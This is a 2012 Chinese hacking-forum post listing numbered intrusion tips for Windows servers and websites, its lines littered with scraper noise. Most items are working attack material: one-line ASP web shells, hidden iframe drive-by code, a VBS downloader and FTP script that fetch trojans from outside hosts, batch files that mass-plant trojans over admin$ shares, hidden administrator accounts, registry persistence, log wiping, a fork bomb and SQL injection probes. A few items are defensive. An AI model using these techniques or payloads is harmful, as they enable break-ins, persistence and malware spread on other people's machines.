中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 B. ~6 s: N3 ?7 g
cacls C:\windows\system32 /G hqw20:R
  O+ k" X' {& y' v0 W/ Q+ @思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
1 i) @6 ]0 d; F0 \' n& ]恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F$ L6 q8 l0 R7 s/ W5 ?" L' d$ a

2 a2 |7 s2 [0 g( p2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。/ F7 o4 T9 x6 s+ o7 V7 q2 F
2 F  j9 J1 n6 i  K5 ?- f1 p
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。, I) z" |, j* p) s2 P2 S& D
- E) A! A$ J, D6 c% g, W+ F
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号4 j9 z! i8 n1 a: Z
3 {: R# }3 _6 |2 t) o
5、利用INF文件来修改注册表
) V8 b/ h3 D& K+ M( q5 Y8 {[Version]
$ A  R. G3 T- u5 ISignature="$CHICAGO$"
4 J0 z9 b( ]+ ~4 @, q[Defaultinstall]# x  ?1 D" M# V, ^. e& P! r- I. z
addREG=Ating
6 h! u. F. r! A2 ?[Ating]
4 i; R' \. L( @7 }* \HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
9 M" R- P' J: I4 i* P0 Q6 D3 J8 \以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:. E( a' m  v8 e/ z+ p1 a
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径6 k# l4 k/ i/ I( @3 Q
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU) m0 l% U: v: V6 b+ F% C4 [* x
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU: O5 i& w/ D/ z$ p: U) d
HKEY_CURRENT_CONFIG 简写为 HKCC
# C  t5 W8 P8 j0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
% Q. |) |5 F) S2 \) j% H"1"这里代表是写入或删除注册表键值中的具体数据
+ V) y% V) r. [  W; I1 {5 z; |6 [3 c+ G8 H. r( S& a5 H
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
, E$ i$ G8 n. M多了一步就是在防火墙里添加个端口,然后导出其键值. a5 O7 J* w3 T& n5 K. o# B
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]2 u6 t4 u9 g, M* t9 w( o; |
3 F, p$ f1 t' U: t1 {2 F
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ z8 @5 _7 V( v& T9 {2 l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。+ r: V0 h+ A# h0 V: l

& `3 i% X: K6 E! o# _8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
( W- E2 E) K- ^
% Z6 x- h0 j3 d2 S% L9 n9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# |! Q) C, e; E* [+ Y# N# R可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
0 P. X7 Y/ @3 G9 c
, g2 |# e, r0 K8 c1 ^$ u10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”5 G7 X5 V. D6 b

& I/ {# w  C1 o9 Z: y: C11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,! H% O9 J# b- e; O" x; x
用法:xsniff –pass –hide –log pass.txt: y& Q3 g( E" u0 ?* s2 H9 V) q$ A
5 X+ M- G6 z  G; y
12、google搜索的艺术  l/ K7 o  `( d; I+ M/ w
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 s% z# q# t9 B& @/ F- T或“字符串的语法错误”可以找到很多sql注入漏洞。) F* |+ `( Y$ _+ H( [

, T; W  [+ j/ j' ?13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
' L' T% W. i" p5 N6 c1 H3 j3 D0 q+ L# G) n' r
14、cmd中输入 nc –vv –l –p 1987* p" A- ?7 T, m/ s; X( a8 P
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 z5 q# {& h$ V6 F# m
1 l1 g6 N% b; c7 @* X# D- b" s15、制作T++木马,先写个ating.hta文件,内容为) g4 v* ?1 @9 w7 |4 F
<script language="VBScript">
9 g0 Y! P3 l# W/ ^set wshshell=createobject ("wscript.shell" )6 K2 z. |5 T4 E" J: X. i
a=wshshell.run("你马的名称",1)8 x: i8 s# a, r: q
window.close
& Q. q6 ~- R4 K! p6 P9 T5 h! W</script>! u6 B+ `/ S1 V
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。1 H8 B. T) R9 }7 A1 [: h7 ^
! C7 U" j7 ?: @4 t
16、搜索栏里输入
& W  [3 L: z3 }* _# E, Z关键字%'and 1=1 and '%'='
9 G5 ?+ A4 b  W, i' i! u: o3 T4 \3 @3 P$ K关键字%'and 1=2 and '%'='4 N# e: S* g1 j2 o+ c
比较不同处 可以作为注入的特征字符
/ b/ `; m5 q7 I/ y# s
' n: Q" L2 f% K1 |2 g# G7 m7 t( U17、挂马代码<html>
4 r; W' g6 u5 [' c' j1 J) ^' y6 m<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
3 f8 @4 ~7 @4 L) b" l/ i</html>: r% W/ ], i: ]' F

! b3 g2 s% t, P% X3 U$ y18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
7 Y1 S0 S1 L/ @! l& z2 gnet localgroup administrators还是可以看出Guest是管理员来。. v5 G+ A; A  x5 C
  ]2 `, J5 W# ?) W+ R* w# ]
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
% l. p0 Z. V3 a* h1 m3 G( c1 p用法: 安装: instsrv.exe 服务名称 路径
7 n  n8 U* Z5 u# K* w' }卸载: instsrv.exe 服务名称 REMOVE
+ ]$ n& ?6 K* j. l! y  [: U, ]; y. A* r, Z  x

3 v3 B# g1 b. K9 \; a21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉* w9 t/ p2 U! M' m; U3 J1 [7 g( j5 k! ]
不能注入时要第一时间想到%5c暴库。
5 @0 z+ w/ k$ m  G( n$ t/ I* ~1 d0 |7 ?& A5 i4 e8 o0 S) `
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
: s+ ^% }, b5 Y! w2 s( U7 h$ k
: q( H1 t. x+ l; V" P! A! q23、缺少xp_cmdshell时/ F$ q# b! S2 [+ q3 d
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" D6 m: A5 G6 Z9 l: J, P假如恢复不成功,可以尝试直接加用户(针对开3389的)
, U: [6 }* I" c8 |declare @o int3 O; {2 I- w2 s9 G0 w; |/ u3 C! Z
exec sp_oacreate 'wscript.shell',@o out
7 I8 u& t+ C  v2 }; Sexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
( W. {8 s! }6 g% x' d6 u+ h% z4 f  I! r- e
24.批量种植木马.bat
; S5 ]5 C2 f. l, x# s0 S, o1 X  @) ifor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中: n9 }) A5 k* t; D( y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
. G8 S, G& }9 X扫描地址.txt里每个主机名一行 用\\开头
1 b4 T, r: b9 x' o; w7 [# Z/ \7 O* O$ c- [: z
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。, u5 F# Y/ V5 s2 Z. r  f; x

  d# s" I" y/ Z9 U$ c0 [7 L26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.9 x8 R, x* N, X0 `/ e  T- u
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
8 P" a4 \1 \+ f" T8 Z! B.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
# l  O* c) H4 u9 g6 O1 s
& a$ ~. \7 ~4 b) [1 ]  Q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP- K4 C/ `3 s, b# h
然后用#clear logg和#clear line vty *删除日志3 Y$ u9 ]  `/ a; O! p: q1 ~3 j
* R1 W2 v5 _) x
28、电脑坏了省去重新安装系统的方法& n& j# [! |. R6 B/ c$ A# u3 g
纯dos下执行,- f: H$ T) t0 |. @. b5 n
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config- Q' o0 Y  [) [
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config: R& u" R5 }7 D( ?

/ n" z, J. U1 i' _. e1 Z5 x29、解决TCP/IP筛选 在注册表里有三处,分别是:
( _$ k4 n2 S7 W. l. C% `1 ]6 b5 aHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip' t0 J" W/ F  i7 ]& L
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
7 T: J! g% x" EHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: Z8 o6 ^" v- t6 S+ j, F8 ?6 O3 O
分别用
+ l" Q% P: W& ]regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. |) J! O/ b- w! d* I
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ U- I* X0 R# {4 u0 S& P. Wregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! g- X1 j" ]2 c2 N+ _命令来导出注册表项9 O' b, Z" [& a$ X) O
然后把三个文件里的EnableSecurityFilters"=dword:00000001,; K/ O/ ?7 ?1 _& S! X+ G
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: z6 O5 }/ T( v; Cregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。2 J! x& ?  R$ a7 r

: D' k$ p0 e  E0 }, @30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
: t7 j7 e% E6 `% s% Z) bSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的36 m  @% E$ \/ ]0 h3 I1 ?

% L) J, S7 f9 E6 Y9 F7 L31、全手工打造开3389工具
/ M7 e4 `, r& l; Y  E0 Y& V2 P打开记事本,编辑内容如下:! s* i, s7 n% H5 N( X
echo [Components] > c:\sql
2 a% z! n. |1 F, f# y: Aecho TSEnable = on >> c:\sql
2 e# y& U. _$ X& P/ \+ T, k( xsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q- K' d7 t! T1 @. X& K  P
编辑好后存为BAT文件,上传至肉鸡,执行, P+ J' `& ^% _

5 M. w7 k; n3 X8 t8 X' I7 ~32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马' q$ S# w$ f/ ^: l  N
3 \  q# X) [( i1 M  N
33、让服务器重启
4 ?# T" a# \( ]$ k; x/ N写个bat死循环:5 X  R! _- ]5 d, T
@echo off
  A% g5 t+ A* k0 ?:loop1! A3 E! {/ A7 V" i- d# ~" e- m0 F# d3 ~
cls& \8 x8 `* G. h4 O- c9 s4 X$ x
start cmd.exe
# W/ a+ m5 F8 d+ y9 j8 Fgoto loop1/ B9 ]- }8 S2 _
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
' Y2 T! H" i3 E- o
# a. f: n8 R$ ], R- d" B3 |34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
( ~( x' s# P4 ~1 g' t$ p6 w9 d% B+ E@echo off: b/ V$ g3 N- A) N+ A+ {1 E
date /t >c:/3389.txt# a% e  P$ n1 {' k8 p
time /t >>c:/3389.txt; M" h* l* |2 G8 o
attrib +s +h c:/3389.bat+ O$ O' ~$ v- g
attrib +s +h c:/3389.txt: Z+ d8 x, L; i- n6 U
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; q. l! C0 u0 m' H: f% o: e并保存为3389.bat
' i/ D% w) K; i打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号( A$ c3 a2 d, H+ |8 C
6 K" x8 q) _1 C! v- V
35、有时候提不了权限的话,试试这个命令,在命令行里输入:% a0 L7 f6 b/ [2 b. S8 n
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
7 q/ @) Y9 @& M9 s8 z1 u1 n输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
/ c$ z) d. o) f/ x2 D4 q8 ~) R2 s, P+ W, f1 W
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件' Q- g& ?2 \& F1 Q& z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
/ ]) J9 f( ^! A8 U) X; ~echo 你的FTP账号 >>c:\1.bat //输入账号8 M9 S' @0 V! q, X/ ?
echo 你的FTP密码 >>c:\1.bat //输入密码) z0 Y8 z+ g5 G
echo bin >>c:\1.bat //登入
9 ^  L( t: F' u3 @. o- Techo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
6 T1 G  g( E1 \7 G  L9 X$ recho bye >>c:\1.bat //退出
4 s& X" h% Z( ?/ O  Z然后执行ftp -s:c:\1.bat即可
$ X1 k) j6 U* u6 z- R) F
0 k' {# v) y; h, k, @37、修改注册表开3389两法
( \7 w  U! c$ U& W3 _! T1 x2 E(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
# L$ \# C+ a% @9 m+ lecho Windows Registry Editor Version 5.00 >>3389.reg
) p2 f. ]9 d! a7 c; Kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
. K9 T5 t7 ?5 [6 V! }echo "Enabled"="0" >>3389.reg4 L% ~5 A  F1 t- G# X4 w+ s' P) y! H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows4 [# ?4 m' s% V
NT\CurrentVersion\Winlogon] >>3389.reg
! o# s8 m8 K; ~% _0 Z9 kecho "ShutdownWithoutLogon"="0" >>3389.reg
3 `* w+ }* T+ @& w2 _echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
8 z5 T( f0 ^: C) H>>3389.reg5 E1 a# }8 X8 P& g$ O8 m( p
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
) t0 \2 G; F  Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: b' z9 ]+ A0 j& E- u; q+ E>>3389.reg7 C: A( q; U. b2 }
echo "TSEnabled"=dword:00000001 >>3389.reg
& A1 o+ @2 Q0 P& W' I. Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, n" [2 a: C6 [- Aecho "Start"=dword:00000002 >>3389.reg6 Z8 `, F$ V: d: M) S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]9 a" A+ \3 ~( ~/ u6 j/ C
>>3389.reg, n% d9 a& W$ }5 ]( ^! f
echo "Start"=dword:00000002 >>3389.reg2 l  O2 [# V8 o: T+ Q- S
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg* _# G2 D) h# d9 m. i/ D5 V& `
echo "Hotkey"="1" >>3389.reg' L' L& o& i: k, J% n' A* v  o+ [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% k+ E- v1 d5 o8 W, Q, @3 A) M
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
$ |$ k0 z0 Z% n2 D/ N/ x/ vecho "PortNumber"=dword:00000D3D >>3389.reg
% ~- w9 }( x; K7 Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: T0 j% C2 L! ^2 I6 |7 ]3 S; B0 O0 B0 fServer\WinStations\RDP-Tcp] >>3389.reg
5 L5 \7 ?0 d  w; q& q- K, f: Zecho "PortNumber"=dword:00000D3D >>3389.reg
: t+ l' Y' \% l" E& i7 o: }3 L把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。# d, d1 W) y- L) k8 Q! Q! ?  w
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
! [8 K& U5 I% r% ?! H( E3 D8 u( \因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效- H$ \- H+ U0 t2 H7 k* d
(2)winxp和win2003终端开启! F% n" g# l8 y1 a" I! U
用以下ECHO代码写一个REG文件:
3 k; |+ A% E5 yecho Windows Registry Editor Version 5.00>>3389.reg' _2 b: ^, N1 M* F1 A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# {8 A1 |' J' D% hServer]>>3389.reg6 V2 E4 K# D0 I, U. S( L4 o' b# v  S
echo "fDenyTSConnections"=dword:00000000>>3389.reg
' C' Q1 y" G; |) t7 Z0 b# wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 \+ U# h+ C' B# W3 K" j9 iServer\Wds\rdpwd\Tds\tcp]>>3389.reg
- n/ D5 m7 o* B8 G  b4 x, Y: p7 oecho "PortNumber"=dword:00000d3d>>3389.reg
: o% a$ b* Y1 L* U& g# R& a: Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' t  Q1 o: N" P- |# HServer\WinStations\RDP-Tcp]>>3389.reg
4 i) `% e( @# n7 w4 C3 g% \echo "PortNumber"=dword:00000d3d>>3389.reg
. [& M; W" o9 F. z然后regedit /s 3389.reg del 3389.reg
$ }" ]; Z9 W9 n: X  jXP下不论开终端还是改终端端口都不需重启
" @% a0 w5 w$ Z% M7 a, v/ y  ?
3 j# F# _+ s# M4 K8 y38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
8 l' L. b5 ^6 ~' w用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa') ?3 s. B; s4 v2 X6 E/ h. [  ]

9 R% h% \9 L+ u5 A& S39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
, O- D- @6 `* `+ I(1)数据库文件名应复杂并要有特殊字符6 W! c$ T8 Y! I% {( j  a; q
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源# O/ Q0 @4 |5 a6 j! ^
将conn.asp文档中的
. P0 r3 j/ h$ j, yDBPath = Server.MapPath("数据库.mdb")- u; r+ e/ u2 n( }/ N
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath& x# B1 N9 L7 C2 \% \- a7 N

# o; D' Z- x1 V4 G修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 S+ _2 X$ _* ?/ Z4 Z(3)不放在WEB目录里
( s- t. L4 c0 p* v6 d& \- t/ N. e+ |0 X# y) ^
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
  B; T/ i7 D# R% I- c; w可以写两个bat文件* N6 ^: R; M: g  m' G% m
@echo off% m& n9 [: \5 w/ `! n/ T
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe, r, d4 e% B1 }$ j
@del c:\winnt\system32\query.exe
) I) l2 \/ s0 k0 Y! M# D@del %SYSTEMROOT%\system32\dllcache\query.exe
5 b, v) l7 J3 }: K+ r' G9 i@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
) u8 m) E" l1 Z2 n% @; y" L( t) @7 ~; P% K* B4 Y
@echo off, |+ m( j8 N% O7 u) N
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe6 u+ W- _2 X5 A5 t  z
@del c:\winnt\system32\tsadmin.exe
5 g. r& x2 f0 S3 B@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
& J, U, g4 u" K& i; w3 P8 @1 l! k8 k" Z: a) s9 h2 ?+ c
41、映射对方盘符
- c9 i) p& R; Z. \telnet到他的机器上,
3 ]( D3 O2 Y5 j( wnet share 查看有没有默认共享 如果没有,那么就接着运行
' Z% [% R$ Y. _net share c$=c:+ U2 y0 y. X- P
net share现在有c$, d. I) V2 u5 H. h# d( t+ t* j
在自己的机器上运行
/ R, [0 j3 R! f) jnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K4 D! B3 E6 x) v9 i- _1 ~2 z( _# l

4 e) t% N' s: i7 x6 a42、一些很有用的老知识2 a' E' W$ _/ W3 z0 `* S
type c:\boot.ini ( 查看系统版本 )
* t! c9 V/ b- }  o+ pnet start (查看已经启动的服务)
9 C! G6 }1 V+ g; R# r8 mquery user ( 查看当前终端连接 )! L! p4 N  H4 ^4 t- ~& P
net user ( 查看当前用户 ). l+ M' c1 O. E4 g* U
net user 用户 密码/add ( 建立账号 ): {: l$ B1 ~: ^# x5 o8 Y
net localgroup administrators 用户 /add (提升某用户为管理员). [* u' p0 n- R/ z9 b6 L0 m' [
ipconfig -all ( 查看IP什么的 )2 `- T# k0 k: L/ n; O/ i
netstat -an ( 查看当前网络状态 ). }& l! T# V2 @0 m
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) W. J, ?/ p0 F7 D8 V% ]克隆时Administrator对应1F4
$ F- f1 _2 Q2 [3 \, I3 _, P. Iguest对应1F58 u- f" H  p; `9 Z
tsinternetuser对应3E8
  T% M$ o0 z& [; ], R" l9 Y# r2 Z
, T5 q* t& y& s( S43、如果对方没开3389,但是装了Remote Administrator Service
7 p& r: j. g5 \  a% g1 o用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
  @  E6 G( i, R: ]  c解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
" U7 h7 [% \: ]9 e5 \先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"- G0 J" E5 ^# P/ l9 ?' I$ t3 D
/ I5 M: I! L3 e! S, b$ l; {# |: M& b: b
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 T( Y4 h/ j/ Q/ E7 Q0 Q本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
9 j1 l7 ]' r, k6 U6 O! ?* H) H* F- `/ j: w$ H2 j: U1 G& z
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
3 l6 X- C, C2 qecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open4 u  d: D3 C9 v: `
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =3 T! t  k  E! T4 H% V# Z8 q! `+ Y
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
# R- ]7 Z" R' |) x8 F1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs7 u* V/ \/ {5 s5 ]
(这是完整的一句话,其中没有换行符)
# D6 u7 d5 m6 G. ~然后下载:
5 y9 ]9 G; d5 C- Ycscript down.vbs http://www.hack520.org/hack.exe hack.exe  A& r$ |/ f* I5 u% L( s

  R+ v6 o1 B. a2 W, Y46、一句话木马成功依赖于两个条件:; Q# c# F' Q1 p! D! p
1、服务端没有禁止adodb.Stream或FSO组件% V" v8 C0 K8 |6 |
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
% C* _0 B! g& P/ k7 D7 j
/ ]0 V& B) Q0 @7 a9 Y47、利用DB_OWNER权限进行手工备份一句话木马的代码:* d, {2 i" k7 W2 i, Z, Y6 A0 A
;alter database utsz set RECOVERY FULL--
) q0 E- k1 u3 Y  y5 H+ x4 ^2 E;create table cmd (a image)--
& `( ]  q& T6 b' P;backup log utsz to disk = 'D:\cmd' with init--3 E. x' F# {6 O9 o/ G
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
0 a! E$ O4 W: F6 n;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; ^" i5 Y& U$ A) `6 |0 f. Q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
. B: I2 N/ [9 h* W! V5 r
8 h$ Z7 n+ d- j) @: \* B48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
! E, \; c+ x% |4 b4 {; m# g6 W( o4 R  {
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options: n6 Z5 J7 W3 B
所有会话用 'all'。) K  `& E3 }1 n0 }
-s sessionid 列出会话的信息。% ]- D1 N7 T3 D; X+ W* z
-k sessionid 终止会话。& v% u" i! s1 D0 z
-m sessionid 发送消息到会话。
) j& W0 X1 h% Q  z1 S! L: a4 c3 W0 X& |6 n! A, S
config 配置 telnet 服务器参数。( Q/ x# [+ @5 q: u
0 r$ d# T( i2 S  Z) I6 }2 z4 c/ \
common_options 为:
! f. S- q2 ~9 C2 ]+ u-u user 指定要使用其凭据的用户
, t! Y3 j8 ?6 \-p password 用户密码
! M0 s9 `2 x/ K: d, z5 a! l4 O8 y) `  H2 f
config_options 为:; Q4 b/ L7 B8 Z
dom = domain 设定用户的默认域
7 f) p* R2 k; `" R- ]ctrlakeymap = yes|no 设定 ALT 键的映射( @6 S! Q; I" |6 y' R5 m
timeout = hh:mm:ss 设定空闲会话超时值1 Y" a* f8 \! l
timeoutactive = yes|no 启用空闲会话。
2 J. k8 t1 k  U) j2 I. M) E4 zmaxfail = attempts 设定断开前失败的登录企图数。
. d; s8 `7 ?, t* Q- P9 rmaxconn = connections 设定最大连接数。
1 a! E8 T) b/ @& Jport = number 设定 telnet 端口。0 U$ U; v( x  H2 [
sec = [+/-]NTLM [+/-]passwd
4 N- p& _5 j9 g+ Q设定身份验证机构
' u( w# s. W0 {fname = file 指定审计文件名。( N/ B! `8 L: ?
fsize = size 指定审计文件的最大尺寸(MB)。
" E3 Z6 K4 W9 kmode = console|stream 指定操作模式。
  `6 H, d1 E7 X; [/ t& Oauditlocation = eventlog|file|both
/ i- L( D" X$ [' p指定记录地点
' O3 O7 H1 `" {audit = [+/-]user [+/-]fail [+/-]admin
: W9 U! \8 m$ P
4 j; L. K6 U: y7 |+ v49、例如:在IE上访问:" w6 }/ V) T2 ]( f9 M
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 y- K  _; ^$ lhack.txt里面的代码是:
6 E& J: E) J% X<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">( W  C+ q( r* g, `3 K) |
把这个hack.txt发到你空间就可以了!5 X, ^, l. k" n
这个可以利用来做网马哦!
% L- {& @7 E- I
. U) ^# u: g4 L$ u+ d& q50、autorun的病毒可以通过手动限制!" E& G( |" n! U
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
! [, W8 q, m) ]4 A: ]* N2,打开盘符用右键打开!切忌双击盘符~) u/ P: d6 h; X. n$ A
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!1 ?" A  e/ j8 H% z! @
( ^  c: Y+ K& i9 V" Q& X0 f
51、log备份时的一句话木马:7 a( L  p) o4 ~' j! S
a).<%%25Execute(request("go"))%%25>
( R( a' ~& S4 H3 {3 v6 yb).<%Execute(request("go"))%>" j/ q  |/ _5 r' @" M* I# G0 b: r5 h
c).%><%execute request("go")%><%# P2 t& ?5 N: k6 [2 U# c) ^7 V3 P
d).<script language=VBScript runat=server>execute request("sb")</Script>
, U$ |! u6 j' \( r- re).<%25Execute(request("l"))%25>
8 e5 b5 z* {. b8 t3 r: \1 }f).<%if request("cmd")<>"" then execute request("pass")%>6 V% @& l+ v; c, M

5 e8 ?8 a/ a& l9 @2 G0 _52、at "12:17" /interactive cmd9 t% m2 k9 T5 V: w+ ?. M% c
